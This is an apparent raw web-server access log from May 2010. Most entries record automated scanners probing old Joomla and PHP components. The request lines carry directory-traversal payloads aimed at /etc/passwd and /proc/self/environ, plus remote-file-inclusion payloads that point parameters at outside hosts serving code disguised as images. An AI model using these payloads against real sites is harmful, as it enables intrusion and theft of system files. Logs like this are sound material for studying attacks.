206.123.118.132 - - [19/May/2010:10:01:12 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:18 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:18 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:18 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
94.125.182.40 - - [19/May/2010:10:01:24 -0500] "GET //errors.php?error=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:10:01:24 -0500] "GET /logs//errors.php?error=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.813"
206.123.118.132 - - [19/May/2010:10:01:26 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:26 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:26 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:26 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
67.159.31.10 - - [19/May/2010:10:01:26 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:10:01:26 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
206.123.118.132 - - [19/May/2010:10:01:27 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:29 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:01:29 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
178.32.3.34 - - [19/May/2010:10:01:35 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
94.125.182.40 - - [19/May/2010:10:01:37 -0500] "GET //errors.php?error=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:10:01:37 -0500] "GET /logs//errors.php?error=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.813"
67.195.112.180 - - [19/May/2010:10:01:38 -0500] "GET /logs/access_log.1159747200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.159.31.10 - - [19/May/2010:10:01:52 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
67.159.31.10 - - [19/May/2010:10:01:52 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
67.159.31.10 - - [19/May/2010:10:01:52 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.159.31.10 - - [19/May/2010:10:02:09 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
178.32.3.34 - - [19/May/2010:10:02:11 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
206.123.118.132 - - [19/May/2010:10:02:22 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:10:02:29 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
206.123.118.132 - - [19/May/2010:10:02:37 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
67.159.31.10 - - [19/May/2010:10:02:41 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
67.159.31.10 - - [19/May/2010:10:02:41 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
67.159.31.10 - - [19/May/2010:10:02:41 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
94.125.182.40 - - [19/May/2010:10:02:42 -0500] "GET //errors.php?error=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:10:02:42 -0500] "GET /logs//errors.php?error=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.813"
206.123.118.132 - - [19/May/2010:10:02:43 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:02:45 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:02:52 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:02:59 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:01 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:07 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:07 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:07 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:07 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:07 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:07 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:07 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:07 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:08 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:09 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:09 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:09 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:09 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:10 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:10 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:10 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:10 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:10 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:10 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:12 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:12 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:17 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:17 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:17 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:18 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:18 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:18 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:18 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:18 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:19 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:23 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:23 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:03:23 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
87.250.255.243 - - [19/May/2010:10:03:28 -0500] "GET /logs/access_log.1244505600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.117.220.133 - - [19/May/2010:10:04:12 -0500] "GET /logs//components/com_calendar.php?absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.820"
87.117.220.133 - - [19/May/2010:10:04:12 -0500] "GET //components/com_calendar.php?absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.820"
74.54.63.138 - - [19/May/2010:10:04:29 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:10:04:29 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:10:04:29 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
206.123.118.132 - - [19/May/2010:10:04:52 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:05:01 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:05:02 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:05:05 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:05:09 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:05:09 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
178.32.3.34 - - [19/May/2010:10:05:15 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:10:05:15 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:10:05:15 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
206.123.118.132 - - [19/May/2010:10:05:16 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:05:24 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:05:25 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:05:26 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:05:34 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:10:05:48 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:10:06:02 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
206.123.118.132 - - [19/May/2010:10:06:07 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:06:07 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:06:07 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
194.100.228.237 - - [19/May/2010:10:06:18 -0500] "GET /logs//components/com_calendar.php?absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.803"
194.100.228.237 - - [19/May/2010:10:06:19 -0500] "GET //components/com_calendar.php?absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.803"
206.123.118.132 - - [19/May/2010:10:07:39 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:07:39 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:10:07:39 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
94.125.182.40 - - [19/May/2010:10:13:51 -0500] "GET /?CONFIG[MWCHAT_Libs]=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 200 1003 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:10:13:52 -0500] "GET /logs/?CONFIG[MWCHAT_Libs]=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 200 6146 "-""libwww-perl/5.813"
87.250.255.243 - - [19/May/2010:10:15:09 -0500] "GET /logs/access_log.1231804800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.80.122.44 - - [19/May/2010:10:15:57 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
81.80.122.44 - - [19/May/2010:10:15:58 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
81.80.122.44 - - [19/May/2010:10:15:58 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
74.55.52.154 - - [19/May/2010:10:24:39 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
74.55.52.154 - - [19/May/2010:10:24:39 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
207.46.199.180 - - [19/May/2010:10:25:46 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.23.18.102 - - [19/May/2010:10:27:36 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
114.108.177.125 - - [19/May/2010:10:28:16 -0500] "GET /logs/access_log.1272240000/?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
114.108.177.125 - - [19/May/2010:10:28:16 -0500] "GET /?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
114.108.177.125 - - [19/May/2010:10:28:17 -0500] "GET /logs/access_log.1271376000/?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
114.108.177.125 - - [19/May/2010:10:28:17 -0500] "GET /logs/?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 6146 "-""Mozilla/5.0"
87.252.3.230 - - [19/May/2010:10:28:17 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
87.252.3.230 - - [19/May/2010:10:28:18 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:10:29:12 -0500] "GET /logs/access_log.1232928000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.227.221.228 - - [19/May/2010:10:29:57 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
216.227.221.228 - - [19/May/2010:10:29:57 -0500] "GET /index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
216.227.221.228 - - [19/May/2010:10:29:57 -0500] "GET /logs/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
207.46.199.44 - - [19/May/2010:10:30:06 -0500] "GET /logs/access_log.1250294400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.67.225.61 - - [19/May/2010:10:30:44 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
216.67.225.61 - - [19/May/2010:10:30:44 -0500] "GET /index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
216.67.225.61 - - [19/May/2010:10:30:44 -0500] "GET /logs/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
94.125.182.40 - - [19/May/2010:10:31:14 -0500] "GET //djpage.php?page=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:10:31:14 -0500] "GET /logs//djpage.php?page=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.813"
67.195.112.180 - - [19/May/2010:10:31:22 -0500] "GET /logs/access_log.1181779200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.108.177.125 - - [19/May/2010:10:31:28 -0500] "GET /?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.121.67.233 - - [19/May/2010:10:31:28 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
114.108.177.125 - - [19/May/2010:10:31:29 -0500] "GET /logs/?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 6146 "-""Mozilla/5.0"
114.108.177.125 - - [19/May/2010:10:31:29 -0500] "GET /logs/access_log.1271376000/?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.121.67.233 - - [19/May/2010:10:31:29 -0500] "GET /index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
174.121.67.233 - - [19/May/2010:10:31:29 -0500] "GET /logs/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
114.108.177.125 - - [19/May/2010:10:31:31 -0500] "GET /logs/access_log.1272240000/?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.239.161.143 - - [19/May/2010:10:33:33 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
211.239.161.143 - - [19/May/2010:10:33:34 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
